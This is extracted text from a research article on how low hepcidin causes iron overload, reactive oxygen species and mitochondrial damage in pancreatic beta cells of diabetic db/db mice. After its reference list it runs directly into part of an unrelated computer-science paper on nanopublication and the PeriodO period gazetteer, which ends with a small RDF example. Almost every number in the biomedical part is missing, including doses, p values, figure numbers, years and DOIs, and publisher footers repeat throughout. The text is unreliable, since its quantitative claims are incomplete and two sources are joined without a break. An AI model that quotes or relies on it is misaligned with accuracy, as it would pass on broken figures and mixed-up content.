animals, treatment and blood parameter determination male, four-week-old db/db mice and their littermate controls were purchased from shanghai laboratory animal centre (shanghai, china). all mice were housed in cages and maintained on a h light/darkness cycle with free access to food and water. the mice were raised for  weeks, during which time they were fed a normal chow diet (iron content: – mg/kg), low iron chow diet (iron content: mg/kg) or a normal chow diet plus iron chelator. the mouse chow were purchased from harlan teklad (madison, wi, usa) ( ). iron chelator referred to as fbs was purchased from ferrokin biosciences (san carlos, ca, usa), a magnesium salt of (s)- ´-(oh)-dadft ( ). drug was dosed at mg/kg, provided once a day. the db/db mice were divided into four groups ( mice/group): ( ) db/db; ( ) db/db + low iron diet; ( ) db/db + iron chelator and ( ) littermate control mice. body weight and fasting blood glucose (fbg) were monitored weekly, with fbg levels determined h after removing food. fasting blood insulin (fins), hba c% and an intraperitoneal glucose tolerance test (ipgtt) were monitored at and  weeks. hba c% was estimated via liquid chromatography (sysmex, tokyo, japan). ipgtt was performed in the morning with an intraperitoneal injection of g/kg glucose after -h fasting. blood glucose levels were measured at , , , and min and the area under the curve (auc) for blood glucose was analyzed with graphpad prism . all animal experimental procedures were performed in accordance with the guidelines established by the research animal care committee of nanjing medical university. statistical analysis results are presented as means ± standard error of the mean (s.e.m.). comparisons between pairs of groups were performed using student’s t-test or using anova for comparisons of multiple groups with spss . software. p values < . were considered to indicate statistical significance. results hyperglycemia inhibits hepcidin expression in db/db mice, cultured mouse islets and min cells hepcidin is expressed in pancreatic β-cells and can be released by secretory granules under glucose stimulation ( ). to assess the effect of hyperglycemia on hepcidin expression, we determined the level of hepcidin mrna expression, protein and secretion content level in db/db mouse islets, high glucose cultured mouse islets and min cells. double immunofluorescent analysis was performed to determine the level of insulin- and hepcidin expression. pancreatic islets of the mouse in the control group strongly expressed insulin- (red) and hepcidin (green), whereas in the db/db group, both insulin- and hepcidin expression were substantially decreased (fig.  a). both the hepcidin mrna level and secretion content decreased in isolated islets following high glucose stimulation (fig.  b and c). to explore whether hyperglycemia impaired gsis function was related to the low level of hepcidin, we infected an ad-hepcidin virus to min cells. the hepcidin mrna level was determined to confirm the expression efficiency (supplementary fig.  ). the gsis function was significantly restored compared with ad-gfp group (p < . ) (fig.  d). low hepcidin expression induces iron overload in pancreatic β-cells hepcidin plays a key role in iron homeostasis ( ). using a prussia blue stain assay, we assessed the iron content in isolated mouse islets cultured under high glucose conditions. 
consistent with our expectations, the iron content increased in a dose-dependent manner with an increase of glucose concentration stimulation as indicated by the blue-stained spots (fig.  a). to visualize iron mobilization into the cytosol under hyperglycemia stimulation, min cells were co-loaded with calcein-am. this work is licensed under a creative commons attribution . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com t shu, z lv et al. low hepcidin impaired mitochondria function : quenching of calcein fluorescence signified an increase in the level of cytosolic chelatable iron. the fluorescence intensity was strongly decreased in the . mm glucose stimulation group but partially recovered with ad-hepcidin-infected group (fig.  b). there was no statistically significant difference in fluorescence intensity between the . mm group and the . mm + ad-gfp group at each time point (p = . ). the cytosolic iron overload probably due to iron intake increase via divalent metal transporter (dmt- ) and transferrin receptor (tfr ) protein level increased (fig.  c). iron aggregation induces ros generation which impairs mitochondria function the excess iron in the cytoplasm could be transported into mitochondria via the mitochondrial uniporter (mcfu). the effect of iron toxicity on mitochondria is associated with the mitochondrial production of oh··radicals according to the fenton reaction mechanism (fe + h o →fe + + (oh)− + oh·) ( ). as expected, hyperglycemia increased the level of ros in min cells (fig.  a). to determine if this increase in ros was mediated by an iron overload, we pretreated cells with an iron scavenger (iron chelator), mcfu inhibitor (ru ) or infected ad-hepcidin virus and subjected the cells to high glucose stimulation. the ros content decreased in all groups compared with the . mm glucose treatment group (fig.  b). there was no statistically significant difference in ros content between the . mm group and the . mm + ad-gfp group (p = . ), nor was there any statistically significant difference between the control, ad-hepcidin, ru and iron chelator groups (supplementary fig.  ). figure  the level of hepcidin expression in control mice and db/db mice pancreatic tissue (a). relative mrna levels of hepcidin were quantified using qrt-pcr analysis with β-actin as an internal control in isolated islets with different concentrations of glucose treatment for  h. ** indicate p <  . compared with the control group (b). hepcidin content was analyzed in isolated islets using an elisa method with different concentration of glucose treatment for  h. ** indicate p <  . compared with the control group (c). gsis was measured as insulin secretion normalized to the insulin content with an elisa method in min cell with different concentrations of glucose treatment for  h. ** indicate p <  . in the ad-hepcidin-infected group compared with the ad-gfp-infected group with .  mm glucose treatment (d). values are expressed as the means ± s.d. and are representative of three individual experiments. this work is licensed under a creative commons attribution . international license.https://doi.org/ . 
/ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com t shu, z lv et al. low hepcidin impaired mitochondria function pb– : excess mitochondrial iron induces ΔΨm depolarization and inhibits atp synthesis excess fe + transported into mitochondria causes inner membrane depolarization which inhibited oxidative respiratory chain and electron transfer, and atp generation is depressed. the mitochondrial membrane potential was analyzed by jc- staining. the results indicate an obvious disruption of the mitochondrial membrane potential in min cells under hyperglycemia stimulation (fig.  a). the iron content in cytoplasm was corrected by pretreating cells with an iron chelator, ru and infected ad-hepcidin virus. the ratio of red fluorescence/green fluorescence was increased compared with the hyperglycemia stimulation group (fig.  b). similarly, when the atp content was observed, hyperglycemia decreased atp content (fig.  c), whereas treatment with the iron chelator, ru , and overexpression of hepcidin could recover the level of atp (fig.  d). there was no statistically significant difference in the ratio of red fluorescence/green fluorescence and atp content between the . mm group and the . mm + ad-gfp group (p = . , p = . ), nor was there any statistically significant difference between the control, ad-hepcidin, ru and iron chelator groups (supplementary fig.  ). figure  the iron content measured by prussian blue staining in isolated mouse islets stimulated with different concentrations of glucose for  h (a). cytosolic iron mobilization was measured with calcein-am fluorescence staining in min cells with different treatments for  h. quenching of calcein-am fluorescence signifies an increase in cytosolic chelatable fe +. fluorescence% was quantified as the area under the curve (auc) from cytosolic calcein fluorescence%.*indicate p <  . compared with the control group; △indicated p <  . compared with the .  mm treatment group (b). dmt and tfr proteins were extracted from min cells with different concentration of glucose treatment for  h, analyzed by western blot; the right panel showed the relative quantification of the normalized dmt ; tfr levels to β-actin. values are expressed as the means ± s.d. and are representative of three individual experiments. *indicate p <  . compared with the control group (c). this work is licensed under a creative commons attribution . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com t shu, z lv et al. low hepcidin impaired mitochondria function : effects of iron restriction on blood glucose levels and insulin levels in db/db mice the results presented in the current manuscript suggest that lower hepcidin expression eventually leads to decreased insulin release (fig.  ). in this case, we restricted the iron content of db/db mice by feeding the animals low iron chow or normal chow + iron chelator. an analysis of body weight, fbg, ipgtt, hba c% and fins were performed. at  weeks, the fbg of db/db mice just started to raise compared with control group (fig.  
b). there were no differences between the db/db animals under the different treatment conditions at this time point. the mice on the low iron chow and iron chelator gained less weight than the db/db mice but remained significantly obese compared to the control mice (p < . , fig.  a). since body weight is a major determinant of glucose tolerance status, we next studied whether these differences in weight might improve glucose tolerance. in the iron chelator and low iron chow groups, the glucose excursion during the ipgtt was higher than in the control group but was much improved compared to the db/db group, consistent with the relationship with body weight (fig.  c). we also observed a partial reversion of fbg, hba1c% and fins in the iron chelator and low iron chow groups when compared to untreated db/db mice (fig.  c, d and e). there was no difference in fbg, ipgtt, hba1c% or fins in control mice fed normal chow, low iron chow or normal chow plus iron chelator, except for body weight (supplementary fig.  ). iron restriction was therefore associated with a considerable benefit in blood glucose control. we used serum ferritin to estimate the iron status of the mice. in the iron chelator and low iron chow groups, the ferritin level was slightly higher than in the control group but was much lower than in the db/db group (fig.  f). linear regression models were used to examine the relationship between iron content and fbg, ipgtt, hba1c% and fins. as expected, the higher the ferritin level, the worse the blood glucose control of the mice (fig.  g, h, i and j). figure: the level of ros was measured by dcfh-da staining and flow cytometry analysis following treatment of min6 cells with different concentrations of glucose. statistical graph of dcfh-da green fluorescence-positive cells as the fold change compared to the control. ** indicates p < . compared with the control group (a). min6 cells were infected with ad-hepcidin or treated with ru360 or an iron chelator under high-glucose conditions, and the level of ros was measured via dcfh-da staining and flow cytometry. △△ indicates p < . compared with the high-glucose group (b). discussion our previous study demonstrated that, in addition to its role in iron regulation, hepcidin is involved in glucotoxicity-mediated impairment of pancreatic β-cell function by inhibiting insulin synthesis ( ). under hyperglycemic conditions, the expression of hepcidin was inhibited and the balance of iron metabolism was disrupted. however, whether this disordered iron metabolism is related to the failure of β-cell function remained unknown. in the present study, we clearly demonstrated that low expression of hepcidin leads to iron overload in β-cells: a portion of the excess fe2+ that accumulates in the cytoplasm is stored in a stable complex as ferritin ( , ), whereas the other portion is pumped into the mitochondria via mcfu ( , ).
in the mitochondria, the accumulation of fe2+ can impair mitochondrial function through: (1) the generation of a large amount of ros via the fenton/haber–weiss mechanism (fe2+ + h2o2 → fe3+ + oh− + oh•) ( , ); and (2) ΔΨm depolarization, which affects electron transport, damages the mitochondrial aerobic respiratory pathway and inhibits atp synthesis ( , ). all of these toxic effects could be reversed by ad-hepcidin infection, ru360 or an iron chelator, and gsis function was also improved when hepcidin levels recovered. our data clearly indicate that iron overload plays an important role in the mitochondrial dysfunction that impairs β-cell function under conditions of hyperglycemia (fig.  ). hepcidin regulates iron metabolism mainly through iron absorption and iron export pathways, and this regulation differs between tissues. hepcidin-knockout mice develop iron overload in the liver and pancreas, but an iron deficit in the macrophage-rich spleen ( ). one would therefore expect a negative correlation between iron content and ferroportin (fpn) expression. however, we did not observe high fpn expression associated with low hepcidin expression in min6 cells stimulated with high glucose (data not shown). we presume that the mechanism by which hepcidin internalizes fpn and leads to its degradation, as clarified in other cell types, is not conserved in pancreatic β-cells. several lines of evidence support this presumption. first, fpn exports iron primarily from duodenal enterocytes, reticuloendothelial cells and macrophages; although fpn is the main receptor for hepcidin and carries out iron export, the mechanism of its response to hepcidin in other cell types is not clearly understood ( ). second, in hansen's work ( ), iron overload was linked not to fpn up-regulation but to increased iron intake, which our study also confirmed: with high glucose stimulation, dmt1 and tfr1 protein expression increased (as fig.  c shows). these results indicate that iron intake may be involved in this process, although the specific molecular mechanism is not yet understood. figure: the ΔΨm was measured by jc-1 staining and flow cytometry analysis following treatment of min6 cells with different glucose concentrations; the percentages of jc-1 red and green fluorescence are shown (a). min6 cells were infected with ad-hepcidin or treated with ru360 or an iron chelator under high-glucose conditions, and the ΔΨm was measured by jc-1 staining and flow cytometry analysis (b). the atp content was measured by atp fluorescence analysis following treatment of min6 cells with various glucose concentrations. ** indicates p < . compared with the control group (c). min6 cells were infected with ad-hepcidin or treated with ru360 or an iron chelator under high-glucose conditions, and the level of atp was measured. △△ indicates p < . compared with the high-glucose group (d). our results indicate that decreased iron deposition in pancreatic tissue can lower blood glucose in a t2dm animal and cell model, and the associated mechanism has been discussed above.
another study, conducted by cooksey, also confirmed our result that restricting iron intake or using iron chelation could significantly ameliorate high blood glucose in ob/ob mice ( ) (the ob/ob lep−/− mouse model of type 2 diabetes). in that study, however, the iron chelator showed a better effect on glucose control than the low iron chow diet, whereas in our study there was no statistical difference in fbg, ipgtt, hba1c% or fins between these two groups of db/db mice. cooksey et al. inferred that chow with this low iron content would induce iron-deficiency anemia in ob/ob mice, which restricted its hypoglycemic effect. in our study, however, at this dietary iron level the hemoglobin (hb) content was maintained at normal levels; only when the diet contained even less iron did the mice begin to display low levels of hb, erythrocyte mean corpuscular volume (mcv) and mean corpuscular hemoglobin (mch), and become diagnosed with iron-deficiency anemia (supplementary fig.  ). we also found that body weight was lower in the iron-restriction diet group (supplementary fig.  ); the reason for the slower weight gain under iron restriction is not yet known. figure: db/db mice were fed either normal chow, low iron content chow or normal chow plus iron chelator. body weight and fasting blood glucose (fbg) levels were recorded every week and plotted as curves (a and b). ipgtt, hba1c% and fasting insulin content (fins) were recorded (c, d and e). the level of ferritin was measured using an elisa (f). * indicates p < . compared with the control group; △ indicates p < . compared with the db/db group. correlations between ferritin levels and fbg, ipgtt, hba1c% and fins (g, h, i and j); regression lines and confidence intervals are plotted where statistically significant, and r represents the correlation coefficient of the linear regression models. although we achieved a satisfactory improvement in blood glucose for the early onset of t2dm in db/db mice with iron restriction, whether iron-targeted treatment will have an effect in db/db mice over the longer term remains unknown. in the early stage of t2dm, the effect of ros overproduction on mitochondrial function and the impact of oxidative stress on β-cell function are reversible; thus, alleviating the toxic effects of iron accumulation could significantly restore the function of β-cells. however, once β-cell functionality has been irreparably destroyed, simply correcting the expression of hepcidin and inhibiting iron deposition may have little to no effect on blood glucose levels. at this stage, improving insulin signaling and insulin resistance would be a more appropriate treatment ( ). in conclusion, we have identified a hepcidin-mediated pathway of glucotoxicity that results in impaired β-cell functionality. decreased hepcidin expression leads to iron accumulation in the cytoplasm and mitochondria; the mitochondrial membrane potential is depolarized, which inhibits atp synthesis and promotes excessive ros production, inducing oxidative stress.
abnormal iron metabolism in the mitochondria eventually impaired insulin secretion as fig.  showed. relieved iron overload status had a positive effect on the blood glucose control in the early onset of t dm in db/db mice. thus, our study may reveal the mechanism involved in the role of hepcidin in the glucotoxcity impaired pancreatic β cell function pathway. supplementary data this is linked to the online version of the paper at https://doi.org/ . / ec- - . declaration of interest the authors declare that there is no conflict of interest that could be perceived as prejudicing the impartiality of the research reported. funding this work was supported by a grant from the health and family planning commission of wuxi city (q ). figure  diagram depicting the role of hepcidin-mediated glucose toxicity on pancreatic β cell. with hyperglycemia stimulation, hepcidin expression decreased leading to iron overload in the cytosol. the excessive iron could squeeze into mitochondria via mcfu transported causing ΔΨm depolarization; inhibited atp production and induced massive ros production. the dysfunction of mitochondria inevitably led to insulin secretion decrease in pancreatic β cells. this work is licensed under a creative commons attribution . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /ec- - https://doi.org/ . /ec- - http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com t shu, z lv et al. low hepcidin impaired mitochondria function : author contribution statement all authors took part in the conception and design of the study, as well as either drafting or critically revising the manuscript. all authors have approved the final version of the manuscript. tingting shu, zhigang lv, yuchun xie and junming tang collected the data and carried out the data analysis. xvhua mao is responsible for the integrity of the work as a whole. data availability statement the datasets used and analyzed during the current study are available from the corresponding author on reasonable request. references daher r, manceau h & karim z. iron metabolism and the role of the iron-regulating hormone hepcidin in health and disease. presse medicale e –e . (https://doi.org/ . /j. lpm. . . ) kuhn lc. iron regulatory proteins and their role in controlling iron metabolism. metallomics: integrated biometal science – . (https://doi.org/ . /c mt h) kulaksiz h, fein e, redecker p, stremmel w, adler g & cetin y. pancreatic beta-cells express hepcidin, an iron-uptake regulatory peptide. journal of endocrinology – . (https://doi. org/ . /joe- - ) aigner e, felder tk, oberkofler h, hahne p, auer s, soyal s, stadlmayr a, schwenoha k, pirich c, hengster p, et al. glucose acts as a regulator of serum iron by increasing serum hepcidin concentrations. journal of nutritional biochemistry – . (https://doi.org/ . /j.jnutbio. . . ) backe mb, moen iw, ellervik c, hansen jb & mandrup-poulsen t. iron regulation of pancreatic beta-cell functions and oxidative stress. annual review of nutrition – . (https://doi. org/ . /annurev-nutr- - ) fernandez-real jm, mcclain d & manco m. mechanisms linking glucose homeostasis and iron metabolism toward the onset and progression of type diabetes. diabetes care – . (https://doi.org/ . /dc - ) aregbesola a, voutilainen s, virtanen jk, aregbesola a & tuomainen tp. 
serum hepcidin concentrations and type diabetes. world journal of diabetes – . (https://doi.org/ . / wjd.v .i . ) simcox ja & mcclain da. iron and diabetes risk. cell metabolism – . (https://doi.org/ . /j.cmet. . . ) pechlaner r, weiss g, bansal s, mayr m, santer p, pallhuber b, notdurfter m, bonora e, willeit j & kiechl s. inadequate hepcidin serum concentrations predict incident type diabetes mellitus. diabetes/metabolism research and reviews – . (https:// doi.org/ . /dmrr. ) suarez-ortegon mf, moreno m, arbelaez a, xifra g, mosquera m, moreno-navarrete jm, aguilar-de plata c, esteve e, ricart w & fernandez-real jm. circulating hepcidin in type diabetes: a multivariate analysis and double blind evaluation of metformin effects. molecular nutrition and food research – . (https://doi.org/ . /mnfr. ) khan ar & awan fr. metals in the pathogenesis of type diabetes. journal of diabetes and metabolic disorders . (https://doi. org/ . / - - - ) liu kl, chen py, wang cm, chen wy, chen cw, owaga e & chang js. dose-related effects of ferric citrate supplementation on endoplasmic reticular stress responses and insulin signalling pathways in streptozotocin-nicotinamide-induced diabetes. food and function – . (https://doi.org/ . /c fo j) choi js, koh iu, lee hj, kim wh & song j. effects of excess dietary iron and fat on glucose and lipid metabolism. journal of nutritional biochemistry – . (https://doi.org/ . /j. jnutbio. . . ) mao x, chen h, tang j, wang l & shu t. hepcidin links gluco- toxicity to pancreatic beta cell dysfunction by inhibiting pdx- expression. endocrine connections – . (https://doi. org/ . /ec- - ) zhao n, zhang as & enns ca. iron regulation by hepcidin. journal of clinical investigation – . (https://doi.org/ . / jci ) rishi g, wallace df & subramaniam vn. hepcidin: regulation of the master iron regulator. bioscience reports e . (https://doi. org/ . /bsr ) hu j, kholmukhamedov a, lindsey cc, beeson cc, jaeschke h & lemasters jj. translocation of iron from lysosomes to mitochondria during acetaminophen-induced hepatocellular injury: protection by starch-desferal and minocycline. free radical biology and medicine – . (https://doi.org/ . /j. freeradbiomed. . . ) lee hj, choi js, lee hj, kim wh, park si & song j. effect of excess iron on oxidative stress and gluconeogenesis through hepcidin during mitochondrial dysfunction. journal of nutritional biochemistry – . (https://doi.org/ . /j. jnutbio. . . ) nam e, han j, suh jm, yi y & lim mh. link of impaired metal ion homeostasis to mitochondrial dysfunction in neurons. current opinion in chemical biology – . (https://doi.org/ . /j. cbpa. . . ) gerencser aa. metabolic activation-driven mitochondrial hyperpolarization predicts insulin secretion in human pancreatic beta-cells. biochimica et biophysica acta – bioenergetics – . (https://doi.org/ . /j.bbabio. . . ) zhou z, ribas v, rajbhandari p, drew bg, moore tm, fluitt ah, reddish br, whitney ka, georgia s, vergnes l, et al. estrogen receptor alpha protects pancreatic beta-cells from apoptosis by preserving mitochondrial function and suppressing endoplasmic reticulum stress. journal of biological chemistry – . (https://doi.org/ . /jbc.m . ) vecchi c, montosi g, zhang k, lamberti i, duncan sa, kaufman rj & pietrangelo a. er stress controls iron metabolism through induction of hepcidin. science – . (https://doi. org/ . /science. ) zhu y, shu t, lin y, wang h, yang j, shi y & han x. inhibition of the receptor for advanced glycation endproducts (rage) protects pancreatic beta-cells. 
biochemical and biophysical research communications – . (https://doi.org/ . /j. bbrc. . . ) chen j, saxena g, mungrue in, lusis aj & shalev a. thioredoxin- interacting protein: a critical link between glucose toxicity and beta- cell apoptosis. diabetes – . (https://doi.org/ . / db - ) qiao n, xu c, zhu yx, cao y, liu dc & han x. ets- as an early response gene against hypoxia-induced apoptosis in pancreatic beta- cells. cell death and disease e . (https://doi.org/ . / cddis. . ) blanchette nl, manz dh, torti fm & torti sv. modulation of hepcidin to treat iron deregulation: potential clinical applications. expert review of hematology – . (https://doi.org/ . / . . ) cooksey rc, jones d, gabrielsen s, huang j, simcox ja, luo b, soesanto y, rienhoff h, abel ed & mcclain da. dietary iron restriction or iron chelation protects from diabetes and loss of beta- cell function in the obese (ob/ob lep-/-) mouse. american journal of physiology. endocrinology and metabolism e –e . (https://doi.org/ . /ajpendo. . ) this work is licensed under a creative commons attribution . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /j.lpm. . . https://doi.org/ . /j.lpm. . . https://doi.org/ . /c mt h https://doi.org/ . /joe- - https://doi.org/ . /joe- - https://doi.org/ . /j.jnutbio. . . https://doi.org/ . /annurev-nutr- - https://doi.org/ . /annurev-nutr- - https://doi.org/ . /dc - https://doi.org/ . /wjd.v .i . https://doi.org/ . /wjd.v .i . https://doi.org/ . /j.cmet. . . https://doi.org/ . /dmrr. https://doi.org/ . /dmrr. https://doi.org/ . /mnfr. https://doi.org/ . / - - - https://doi.org/ . / - - - https://doi.org/ . /c fo j https://doi.org/ . /j.jnutbio. . . https://doi.org/ . /j.jnutbio. . . https://doi.org/ . /ec- - https://doi.org/ . /ec- - https://doi.org/ . /jci https://doi.org/ . /jci https://doi.org/ . /bsr https://doi.org/ . /bsr https://doi.org/ . /j.freeradbiomed. . . https://doi.org/ . /j.freeradbiomed. . . https://doi.org/ . /j.jnutbio. . . https://doi.org/ . /j.jnutbio. . . https://doi.org/ . /j.cbpa. . . https://doi.org/ . /j.cbpa. . . https://doi.org/ . /j.bbabio. . . https://doi.org/ . /jbc.m . https://doi.org/ . /science. https://doi.org/ . /science. https://doi.org/ . /j.bbrc. . . https://doi.org/ . /j.bbrc. . . https://doi.org/ . /db - https://doi.org/ . /db - https://doi.org/ . /cddis. . https://doi.org/ . /cddis. . https://doi.org/ . / . . https://doi.org/ . / . . https://doi.org/ . /ajpendo. . http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com t shu, z lv et al. low hepcidin impaired mitochondria function pb– : girelli d, nemeth e & swinkels dw. hepcidin in the diagnosis of iron disorders. blood – . (https://doi.org/ . / blood- - - ) saporito-magrina c, musacco-sebio r, acosta jm, bajicoff s, paredes-fleitas p, reynoso s, boveris a & repetto mg. copper(ii) and iron(iii) ions inhibit respiration and increase free radical- mediated phospholipid peroxidation in rat liver mitochondria: effect of antioxidants. journal of inorganic biochemistry – . (https://doi.org/ . /j.jinorgbio. . . ) moles a, torres s, baulies a, garcia-ruiz c & fernandez-checa jc. mitochondrial-lysosomal axis in acetaminophen hepatotoxicity. frontiers in pharmacology . (https://doi.org/ . / fphar. . ) urrutia pj, aguirre p, tapia v, carrasco cm, mena np & nunez mt. 
cell death induced by mitochondrial complex i inhibition is mediated by iron regulatory protein . biochimica et biophysica acta – molecular basis of disease – . (https://doi. org/ . /j.bbadis. . . ) zhao mh, liang s, kim sh, cui xs & kim nh. fe(iii) is essential for porcine embryonic development via mitochondrial function maintenance. plos one e . (https://doi. org/ . /journal.pone. ) hirota k. an intimate crosstalk between iron homeostasis and oxygen metabolism regulated by the hypoxia-inducible factors (hifs). free radical biology and medicine – . (https:// doi.org/ . /j.freeradbiomed. . . ) hansen jb, dos santos lrb, liu y, prentice kj, teudt f, tonnesen m, jonas jc, wheeler mb & mandrup-poulsen t. glucolipotoxic conditions induce β-cell iron import, cytosolic ros formation and apoptosis. journal of molecular endocrinology – . (https:// doi.org/ . /jme- - ) mastrogiannaki m, matak p, keith b, simon mc, vaulont s & peyssonnaux c. hif- alpha, but not hif- alpha, promotes iron absorption in mice. journal of clinical investigation – . (https://doi.org/ . /jci ) shah ym, matsubara t, ito s, yim sh & gonzalez fj. intestinal hypoxia-inducible transcription factors are essential for iron absorption following iron deficiency. cell metabolism – . (https://doi.org/ . /j.cmet. . . ) matsunaga t, li s, adachi t, joo e, gu n, yamazaki h, yasuda k, kondoh t & tsuda k. hyperoxia reverses glucotoxicity-induced inhibition of insulin secretion in rat ins- beta cells. bioscience, biotechnology, and biochemistry – . (https://doi.org/ . / . . ) bensellam m, duvillie b, rybachuk g, laybutt dr, magnan c, guiot y, pouyssegur j & jonas jc. glucose-induced o( ) consumption activates hypoxia inducible factors and in rat insulin-secreting pancreatic beta-cells. plos one e . (https://doi.org/ . /journal.pone. ) suzuki k, sato y, kai s, nishi k, adachi t, matsuo y & hirota k. volatile anesthetics suppress glucose-stimulated insulin secretion in min cells by inhibiting glucose-induced activation of hypoxia- inducible factor . peerj e . (https://doi.org/ . / peerj. ) mitrakou a, katsiki n & lalic nm. type diabetes mellitus and the elderly: an update on drugs used to treat glycaemia. current vascular pharmacology – . (https://doi.org/ . / ) received in final form january accepted january this work is licensed under a creative commons attribution . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /blood- - - https://doi.org/ . /blood- - - https://doi.org/ . /j.jinorgbio. . . https://doi.org/ . /fphar. . https://doi.org/ . /fphar. . https://doi.org/ . /j.bbadis. . . https://doi.org/ . /j.bbadis. . . https://doi.org/ . /journal.pone. https://doi.org/ . /journal.pone. https://doi.org/ . /j.freeradbiomed. . . https://doi.org/ . /j.freeradbiomed. . . https://doi.org/ . /jme- - https://doi.org/ . /jme- - https://doi.org/ . /jci https://doi.org/ . /j.cmet. . . https://doi.org/ . / . . https://doi.org/ . / . . https://doi.org/ . /journal.pone. https://doi.org/ . /peerj. https://doi.org/ . /peerj. https://doi.org/ . / https://doi.org/ . / http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://doi.org/ . 
nanopublication beyond the sciences: the periodo period gazetteer. patrick golden and ryan shaw, school of information and library science, university of north carolina at chapel hill, chapel hill, nc, united states. submitted august, accepted january, published february. corresponding author: patrick golden, ptgolden@email.unc.edu. academic editor: edward fox. copyright golden and shaw, distributed under creative commons cc-by. open access. abstract the information expressed in humanities datasets is inextricably tied to a wider discursive environment that is irreducible to complete formal representation. humanities scholars must wrestle with this fact when they attempt to publish or consume structured data. the practice of "nanopublication," which originated in the e-science domain, offers a way to maintain the connection between formal representations of humanities data and its discursive basis. in this paper we describe nanopublication, its potential applicability to the humanities, and our experience curating humanities nanopublications in the periodo period gazetteer. subjects digital libraries, world wide web and web science. keywords nanopublication, periodization, scholarly communication, time, linked data, json-ld. introduction humanities scholars who wish to make their research materials usable with networked digital tools face a common dilemma: how can one publish research materials as "data" without severing them from the ideas and texts that originally gave them meaning? the kinds of information produced in the humanities—biographical details, political and temporal boundaries, and relationships between people, places, and events—are inextricably tied to arguments made by humanities scholars. converting all, or even much, of the information expressed in scholarly discourse into algorithmically processable chunks of formal, structured data has so far proven to be extraordinarily difficult. but rather than attempt to exhaustively represent her research, a scholar can promote small pieces of information within her work using the practice of nanopublication (mons & velterop, ). nanopublications include useful and usable representations of the provenance of structured assertions.
these representations of provenance are useful because they allow consumers of the published data to make connections to other sources of information about the context of the production of that data. in this way, they strike a balance between the needs of computers for uniformity in data modeling with the needs of humans to judge information based on the wider context of its production. an emphasis on connecting assertions with their authors is particularly well-suited for the needs of humanities scholars. by adopting nanopublication, creators of datasets in the humanities can focus on publishing small units of practically useful, curated assertions while keeping a persistent pointer to the basis of those claims—the discourse of scholarly publishing itself—rather than its isolated representation in formal logic. how to cite this article golden and shaw ( ), nanopublication beyond the sciences: the periodo period gazetteer. peerj comput. sci. :e ; doi . /peerj-cs. mailto:ptgolden@email.unc.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. we offer as an example of this approach the periodo period gazetteer, which collects definitions of time periods made by archaeologists and other historical scholars (http: //perio.do). a major goal of the gazetteer was to make period definitions parsable and comparable by computers, while also retaining links to the broader scholarly context in which they were conceived. we found that a nanopublication-centric approach allowed us to achieve this goal. in this paper, we describe the concept of nanopublication, its origin in the hard sciences, and its applicability to the humanities. we then describe the periodo period gazetteer in detail, discuss our experience mapping nonscientific data into nanopublications, and offer advice to other humanities-oriented projects attempting to do the same. nanopublications nanopublication is an approach to publishing research in which individual research findings are modeled as structured data in such a way that they retain information about their provenance. this is in contrast to both traditional narrative publishing, where research findings are not typically published in a structured, computer readable format, and “data dumps” of research findings which are typically published without any embedded information about their origin or production. the nanopublication approach is motivated by a desire to publish structured data without losing the wider research context and the benefits of traditional scholarly communication (groth, gibson & velterop, ). nanopublication emerged from work in data-intensive sciences like genomics and bioinformatics, where recent advances in computational measurement techniques have vastly lowered the barrier to collecting genetic sequencing data. as a result, millions of papers have been published with findings based on these new methods. however, the reported results are almost always published in the form of traditional narrative scholarly publications (mons et al., ). while narrative results can be read and understood by humans, they are not so easily digested by computers. 
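before turning to how these parts are enumerated below, it may help to see the overall shape of such a unit. the sketch that follows is our own illustration, serialized as trig (an extension of turtle that adds named graphs): the uris, graph names and the toy assertion are invented placeholders rather than anything drawn from a published dataset, and the three named graphs follow the assertion / provenance / publication-info pattern of the nanopublication schema (np:) vocabulary.

@prefix np:   <http://www.nanopub.org/nschema#> .
@prefix prov: <http://www.w3.org/ns/prov#> .
@prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .
@prefix xsd:  <http://www.w3.org/2001/XMLSchema#> .
@prefix ex:   <http://example.org/nanopub/1#> .

# head graph: ties the three parts of the nanopublication together
ex:head {
    ex:pub a np:Nanopublication ;
        np:hasAssertion       ex:assertion ;
        np:hasProvenance      ex:provenance ;
        np:hasPublicationInfo ex:pubinfo .
}

# the assertion: a single, small unit of information
ex:assertion {
    <http://example.org/periods/example-period> rdfs:label "Example period" .
}

# provenance of the assertion: where the information came from
ex:provenance {
    ex:assertion prov:wasDerivedFrom <http://example.org/sources/example-article> .
}

# provenance of the nanopublication itself: who extracted the assertion, and when
ex:pubinfo {
    ex:pub prov:wasAttributedTo <http://example.org/curators/example-curator> ;
        prov:generatedAtTime "2016-01-01T00:00:00Z"^^xsd:dateTime .
}

reading the three graphs together, a consumer can take up the assertion on its own, or weigh it against the record of who made it and how it came to be published.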
